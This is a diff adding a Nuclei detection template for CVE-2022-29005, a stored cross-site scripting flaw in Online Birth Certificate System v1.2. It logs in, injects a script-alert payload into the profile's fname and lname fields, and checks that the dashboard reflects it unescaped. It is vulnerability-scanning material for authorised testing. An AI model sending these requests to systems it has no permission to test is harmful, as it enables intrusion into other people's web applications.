■ ■ ■ ■ ■ ■
config/nuclei-templates/cves/2022/CVE-2022-29005.yaml
| 1 | + | id: CVE-2022-29005 |
| 2 | + | info: |
| 3 | + | name: Online Birth Certificate System V1.2 - Stored Cross-Site scripting |
| 4 | + | author: TenBird |
| 5 | + | severity: medium |
| 6 | + | description: | |
| 7 | + | Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters. |
| 8 | + | reference: |
| 9 | + | - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt |
| 10 | + | - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ |
| 11 | + | - https://nvd.nist.gov/vuln/detail/CVE-2022-29005 |
| 12 | + | classification: |
| 13 | + | cve-id: CVE-2022-29005 |
| 14 | + | metadata: |
| 15 | + | verified: true |
| 16 | + | tags: cve,cve2022,xss,obcs,authenticated |
| 17 | + | |
| 18 | + | requests: |
| 19 | + | - raw: |
| 20 | + | - | |
| 21 | + | POST /obcs/user/login.php HTTP/1.1 |
| 22 | + | Host: {{Hostname}} |
| 23 | + | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 |
| 24 | + | |
| 25 | + | mobno={{username}}&password={{password}}&login= |
| 26 | + | |
| 27 | + | - | |
| 28 | + | POST /obcs/user/profile.php HTTP/1.1 |
| 29 | + | Host: {{Hostname}} |
| 30 | + | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 |
| 31 | + | |
| 32 | + | fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit= |
| 33 | + | |
| 34 | + | - | |
| 35 | + | GET /obcs/user/dashboard.php HTTP/1.1 |
| 36 | + | Host: {{Hostname}} |
| 37 | + | |
| 38 | + | req-condition: true |
| 39 | + | redirects: true |
| 40 | + | max-redirects: 2 |
| 41 | + | cookie-reuse: true |
| 42 | + | matchers: |
| 43 | + | - type: dsl |
| 44 | + | dsl: |
| 45 | + | - 'contains(all_headers_3, "text/html")' |
| 46 | + | - 'status_code_3 == 200' |
| 47 | + | - contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>') |
| 48 | + | condition: and |
| 49 | + | |